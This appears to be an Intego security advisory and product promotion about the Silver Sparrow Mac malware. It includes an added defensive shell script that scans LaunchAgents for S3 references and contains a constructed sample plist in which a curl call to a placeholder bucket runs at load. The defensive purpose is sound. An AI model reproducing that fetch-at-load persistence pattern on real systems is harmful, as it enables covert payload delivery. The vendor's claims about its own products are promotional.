Seattle, WA, February 2021
A new family of Mac malware dubbed Silver Sparrow (detected by Intego and others as OSX/Slisp) has apparently infected at least 40,000 Macs, according to reports. It is also one of the first pieces of Mac malware that runs natively on Apple’s new M1 processors. These facts combined have propelled Silver Sparrow into the mainstream media spotlight.
What potential harm can Silver Sparrow do to Macs?
At this time, the malware installer packages will no longer run. Apple addressed the two known variants of Silver Sparrow by revoking the developer’s code-signing certificates. Because the malware is no longer signed by an authorized Apple Developer ID, the two known variants of the malware won’t be able to run anymore if someone tries to install them today.
However, it’s worth noting that Apple’s mitigation efforts may not necessarily remove all existing malware infections, and may not block potential future Silver Sparrow variants that would presumably be signed with yet another Apple Developer ID.
Before Apple’s revocation of the code-signing certificates, the malware would install a LaunchAgent as a “persistence” method (i.e. a way for the malware to continue running, even after a victim restarts their Mac).
The LaunchAgent would check an Amazon Web Services (AWS) S3 bucket for further instructions and a potential additional malicious payload, but researchers have not yet observed the malware downloading any final payload. It appears that Amazon may have shut down the S3 buckets associated with the two known Silver Sparrow variants.
Before the revocation of the Apple certificates and the shutdown of the S3 buckets, a final payload may theoretically have been available for a short period of time, or only to certain victims. However, this is speculation, and it unfortunately cannot be confirmed from the currently available evidence.
How can one remove or prevent Silver Sparrow and other threats?
Given that Apple has frequently notarized Mac malware, and Apple’s other threat mitigation features such as Gatekeeper, XProtect, and MRT do not block many types of threats, it is evident that Apple’s own macOS protection methods are insufficient by themselves.
Intego VirusBarrier X9, included with Intego’s Mac Premium Bundle X9, can protect against, detect, and eliminate this malware. VirusBarrier detects Silver Sparrow as OSX/Slisp.
VirusBarrier is designed by Mac security experts, and it protects against a much wider variety of malware than Apple’s mitigation methods.
Although some reports have suggested that users can “vaccinate” their Macs by creating a blank file at ~/Library/._insu (which could theoretically prevent the malware from installing, or cause the malware to remove itself), and at least one company actually created a script to assist users in doing so, we do not recommend this for several reasons, as follows.
Apple has already effectively disabled the two known variants of this malware, so it should no longer be possible for them to install. Additionally, any future version of this malware would likely no longer rely on the presence of a file whose path is now widely known to the public to decide whether to install. Moreover, creating your own empty file at ~/Library/._insu can lead to false-positive detections from some anti-malware products, which makes it harder for those companies to determine the malware’s actual reach.
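The two mechanisms described above, a LaunchAgent that calls out to an S3 bucket and the ambiguous ~/Library/._insu file, can be triaged with a small script. The following is an added example for this article, not Intego’s tooling or anything from the original report: it lists per-user LaunchAgent property lists whose text references an amazonaws.com hostname (a review heuristic chosen here, not an indicator taken from the page; real plists may also be binary, which this text search would miss) and reports whether the ~/Library/._insu path exists, treating its presence as ambiguous rather than as proof of infection. The sample plists it builds are constructed, and the S3 URL in them is a placeholder.

```shell
#!/bin/sh
# Added triage example, not part of the original article and not Intego's code.
# Assumption: LaunchAgent plists are XML text; SUSPECT_PATTERN is a review
# heuristic chosen by the author of this example, not an IoC from the page.

SUSPECT_PATTERN='amazonaws\.com'

# scan_launch_agents DIR
#   Prints the path of every .plist in DIR whose text matches SUSPECT_PATTERN.
#   A hit means "review this file", not "infected". Always returns 0.
scan_launch_agents() {
    dir="$1"
    [ -d "$dir" ] || return 0
    for f in "$dir"/*.plist; do
        [ -f "$f" ] || continue
        if grep -q -E "$SUSPECT_PATTERN" "$f" 2>/dev/null; then
            printf '%s\n' "$f"
        fi
    done
    return 0
}

# marker_status HOME_DIR
#   Prints "present" or "absent" for HOME_DIR/Library/._insu. Presence alone is
#   ambiguous: it can mean a manual "vaccination" as well as an infection, which
#   is the false-positive problem the article describes.
marker_status() {
    if [ -e "$1/Library/._insu" ]; then
        echo present
    else
        echo absent
    fi
}

# demo: build a constructed home directory with one benign and one suspicious
# LaunchAgent, run both checks against it, then clean up.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/Library/LaunchAgents"
    # Constructed benign agent.
    cat > "$tmp/Library/LaunchAgents/com.example.benign.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.benign</string>
  <key>ProgramArguments</key><array><string>/usr/bin/true</string></array>
</dict></plist>
EOF
    # Constructed sample, not a real Silver Sparrow artifact: the URL is a placeholder.
    cat > "$tmp/Library/LaunchAgents/com.example.suspect.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.suspect</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -s https://PLACEHOLDER-bucket.s3.amazonaws.com/PLACEHOLDER</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>
EOF
    echo "marker file: $(marker_status "$tmp")"
    echo "LaunchAgents referencing S3 (review manually):"
    scan_launch_agents "$tmp/Library/LaunchAgents"
    rm -rf "$tmp"
}

demo
```

On a real Mac you would point scan_launch_agents at ~/Library/LaunchAgents and /Library/LaunchAgents and marker_status at $HOME; any hit is a lead for manual review or a scan with a real-time anti-malware product, not a verdict.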
If you believe your Mac may have been infected, or to prevent future infections, it’s best to use antivirus software from a trusted Mac developer that includes real-time scanning, such as VirusBarrier X9—which also protects Macs from the first known M1-native malware, a variant of OSX/Pirrit. VirusBarrier proactively blocked the new Pirrit variant before it was even discovered.
Intego offers an award-winning line of products providing Mac security and enhancing Mac performance. Intego has been designing software to protect and optimize Apple products for over 17 years. No other company has been focused on Mac security and performance as long as Intego. Intego creates products for a full range of Mac and iOS devices, such as iPhones and iPads. Its depth of experience allows the company to create software that not only works well, but is elegant and intuitive. Much like a Mac.